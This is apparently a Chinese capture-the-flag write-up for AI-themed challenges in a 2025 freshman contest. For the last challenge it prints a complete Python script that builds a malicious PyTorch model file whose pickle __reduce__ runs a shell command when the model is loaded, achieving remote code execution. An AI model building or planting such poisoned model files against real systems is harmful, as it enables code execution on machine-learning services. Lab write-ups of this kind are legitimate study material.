【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

[Aura JailBreak](#Aura JailBreak)

明阳未许

[🔥🌸 LittFlower: Fire Boom! 🌸🔥](#🔥🌸 LittFlower: Fire Boom! 🌸🔥)


许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai,写个解题脚本拿到flag

🤫歌的😡🔥

附件内容,一个是有火的图,一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

复制代码
import torch
import torch.nn as nn
from torchvision import models
import builtins
import os

class MaliciousMobileNetV2(models.MobileNetV2):
    def __init__(self, num_classes=2):
        super().__init__(num_classes=num_classes)
        
    def __reduce__(self):
        
        state_dict = self.state_dict()

        fake_state_dict = state_dict.copy()
        
        if "classifier.1.weight" in fake_state_dict:
            del fake_state_dict["classifier.1.weight"]
        if "classifier.1.bias" in fake_state_dict:
            del fake_state_dict["classifier.1.bias"]
        cmd = "import os; os.system('cp /flag /app/static/flag.txt')"
        
        return (builtins.eval, (
            "(exec(cmd), state_dict)[1]", 
            {'cmd': cmd, 'state_dict': fake_state_dict}
        ))

if __name__ == '__main__':
    model = MaliciousMobileNetV2(num_classes=2)
    save_path = 'evil.pth'
    print(f"正在生成 Payload: {save_path} ...")
    torch.save(model, save_path)
    print("生成成功!")

上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag

相关推荐
SuniaWang4 小时前
《Spring AI + 大模型全栈实战》学习手册系列 · 专题六:《Vue3 前端开发实战:打造企业级 RAG 问答界面》
java·前端·人工智能·spring boot·后端·spring·架构
IDZSY04305 小时前
AI社交平台进阶指南:如何用AI社交提升工作学习效率
人工智能·学习
七七powerful5 小时前
运维养龙虾--AI 驱动的架构图革命:draw.io MCP 让运维画图效率提升 10 倍,使用codebuddy实战
运维·人工智能·draw.io
水星梦月6 小时前
大白话讲解AI/LLM核心概念
人工智能
温九味闻醉6 小时前
关于腾讯广告算法大赛2025项目分析1 - dataset.py
人工智能·算法·机器学习
White-Legend6 小时前
第三波GPT5.4 日400刀
人工智能·ai编程
. . . . .6 小时前
Claude Code Hooks的原理、触发执行机制以及如何编写 Hooks
人工智能
w_t_y_y6 小时前
codex(一)下载安装&使用
人工智能
唐兴通个人6 小时前
唐兴通应邀为平安财产险北京分公司高层主讲《新媒体营销》专项培训,引领保险业AI时代内容营销变革
人工智能